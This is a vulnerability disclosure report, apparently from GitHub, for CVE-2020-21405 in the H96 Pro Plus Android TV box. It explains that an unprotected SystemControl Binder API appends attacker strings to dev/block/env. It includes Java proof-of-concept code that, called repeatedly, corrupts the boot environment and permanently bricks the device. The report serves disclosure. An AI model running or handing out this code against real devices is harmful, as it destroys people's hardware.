CVE-2020-21405: TVBoxBugs/H96_Pro_Plus_SmartTV_Vulnerability at master · helloworldxp/TVBoxBugs

[Vulnerability in H96 Pro Plus Smart TV Box]

I would like to report a security vulnerability in H96 Smart TV Box ( specs: H96 Pro Plus Smart TV Box Android 7.1 2gb/16gb Amlogic S912 Octa Core 1000M LAN 3D 4K Mini PC Streaming Player with Dual WIFI 2.4GHz/5 GHz Bluetooth 4.1).

The vulnerability allows to totally break down the device after invoking an API with certain parameters for large number of times (>10000). After repeated invocation, the invocation leads to overwriting a critical system file under "dev/block/env", thus causing the boot up environment settings to be corrupt. As a result, the device will not be able to reboot - even under safe mode.

We suspect the vulnerability spans other Amlogic devices that contains the same vulnerable API.

This vulnerability is due to the following:

The device introduces a custom API in the SystemControl system service “saveDeepColorAttr"” which takes 2 string arguments. The API is not protected at all, thus can be invoked by any 3rd party app . After invoking the API, the second string argument will be appended to the file (dev/block/env). After a sufficiently large number of invocations, the file will be corrupt.

We can cause the problem by invoking the following method repeatedly:

Class ServiceManager = Class.forName(“android.os.ServiceManager”);

Method getService = ServiceManager.getMethod("getService", String.class);

mRemote = (IBinder) getService.invoke(null,"system_control");

Parcel localParcel1 = Parcel.obtain();

Parcel localParcel2 = Parcel.obtain();

localParcel1.writeInterfaceToken(“droidlogic.ISystemControlService”);

localParcel1.writeString(“1080p60hz”);

localParcel1.writeString(“RandomlyLongString”);

mRemote.transact(0x2f, localParcel1, localParcel2, 0); //0x2f corresponds to the API saveDeepColorAttr

localParcel2.recycle();

localParcel1.recycle();